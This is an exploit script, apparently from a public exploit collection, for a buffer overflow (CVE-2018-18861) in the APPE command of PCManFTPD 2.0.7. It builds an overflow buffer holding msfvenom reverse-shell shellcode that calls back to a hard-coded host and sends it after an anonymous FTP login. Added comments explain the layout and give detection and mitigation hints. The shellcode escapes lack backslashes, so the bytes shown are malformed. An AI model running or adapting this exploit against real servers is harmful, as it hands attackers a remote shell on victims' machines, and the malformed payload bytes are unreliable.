#!/usr/bin/python
# Exploit Title: PCManFTPD 2.0.7 Server APPE Command - Buffer Overflow Exploit
# Date: 30/10/2018
# Exploit Author: DC - Telspace Systems
# Vendor Homepage: http://pcman.openfoundry.org/
# Exploit Title: PCManFTPD 2.0.7 Server APPE Command - Buffer Overflow Exploit
# Date: 30/10/2018
# Exploit Author: DC - Telspace Systems
# Vendor Homepage: http://pcman.openfoundry.org/
# Contact: services[@]telspace.co.za
# Version: 2.0.7
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: CVE-2018-18861
# Created in preparation for OSCE - DC - Telspace Systems
# Simple BOF for APPE command in PCManFTPD 2.0.7

import socket
import sys

#Exact match at offset 2005 (MSF pattern find)
#JMP ESP = 7E429353 (user32.dll)
#shellcode thanks to MSF - msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.111 LPORT=443 -f c -a x86 --platform windows -b "x00x0Ax0Dxff" -e x86/shikata_ga_nai

# Buffer layout, per the three comments above: a 2005-byte filler, a
# 4-byte return-address overwrite, a 50-byte pad, then the encoded payload
# blob. The address is fixed for the tested build named in the header
# (Windows XP Prof SP3 ENG x86); on a build with a different user32.dll
# layout, or with ASLR/DEP in effect, the same bytes would not land.
shellcode = 'x41' * 2005
shellcode += 'x53x93x42x7e'
shellcode += 'x90' * 50
shellcode += ("xbexa3x2bxb0x95xdaxd4xd9x74x24xf4x58x31xc9xb1"
"x52x83xc0x04x31x70x0ex03xd3x25x52x60xefxd2x10"
"x8bx0fx23x75x05xeax12xb5x71x7fx04x05xf1x2dxa9"
"xeex57xc5x3ax82x7fxeax8bx29xa6xc5x0cx01x9ax44"
"x8fx58xcfxa6xaex92x02xa7xf7xcfxefxf5xa0x84x42"
"xe9xc5xd1x5ex82x96xf4xe6x77x6exf6xc7x26xe4xa1"
"xc7xc9x29xdax41xd1x2exe7x18x6ax84x93x9axbaxd4"
"x5cx30x83xd8xaex48xc4xdfx50x3fx3cx1cxecx38xfb"
"x5ex2axccx1fxf8xb9x76xfbxf8x6exe0x88xf7xdbx66"
"xd6x1bxddxabx6dx27x56x4axa1xa1x2cx69x65xe9xf7"
"x10x3cx57x59x2cx5ex38x06x88x15xd5x53xa1x74xb2"
"x90x88x86x42xbfx9bxf5x70x60x30x91x38xe9x9ex66"
"x3exc0x67xf8xc1xebx97xd1x05xbfxc7x49xafxc0x83"
"x89x50x15x03xd9xfexc6xe4x89xbexb6x8cxc3x30xe8"
"xadxecx9ax81x44x17x4dx6ex30x17xe2x06x43x17xfd"
"x6dxcaxf1x97x81x9bxaax0fx3bx86x20xb1xc4x1cx4d"
"xf1x4fx93xb2xbcxa7xdexa0x29x48x95x9axfcx57x03"
"xb2x63xc5xc8x42xedxf6x46x15xbaxc9x9exf3x56x73"
"x09xe1xaaxe5x72xa1x70xd6x7dx28xf4x62x5ax3axc0"
"x6bxe6x6ex9cx3dxb0xd8x5ax94x72xb2x34x4bxddx52"
"xc0xa7xdex24xcdxedxa8xc8x7cx58xedxf7xb1x0cxf9"
"x80xafxacx06x5bx74xdcx4cxc1xddx75x09x90x5fx18"
"xaax4fxa3x25x29x65x5cxd2x31x0cx59x9exf5xfdx13"
"x8fx93x01x87xb0xb1")

# Python 2 print statement; the script is not valid Python 3 as written.
print "Connecting and sending buffer... "

# Target host and port are hard-coded (FTP control channel, port 21).
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.3',21))  # connect() returns None; 'connect' is never read
s.recv(1024)  # server banner, discarded
# Anonymous login. Whether the server actually accepts it is not checked:
# every reply below is read and thrown away, so a failed login or a
# rejected command does not change what the script does next.
s.send('USER anonymous ')
s.recv(1024)
s.send('PASS anonymous ')
s.recv(1024)
# The oversized APPE argument is the trigger for CVE-2018-18861. For
# monitoring purposes, an anonymous FTP login followed by an APPE command
# whose argument runs to roughly 2 KB or more is the observable pattern;
# on the mitigation side, PCManFTPD 2.0.7 has no fix on this page, so
# removing the service or blocking anonymous access to it is what closes
# the exposure.
s.send('APPE ' + shellcode + ' ')
s.close()

# Printed unconditionally: the script has no way to know whether the
# overflow, or anything else, happened.
print "Executed, check for shell."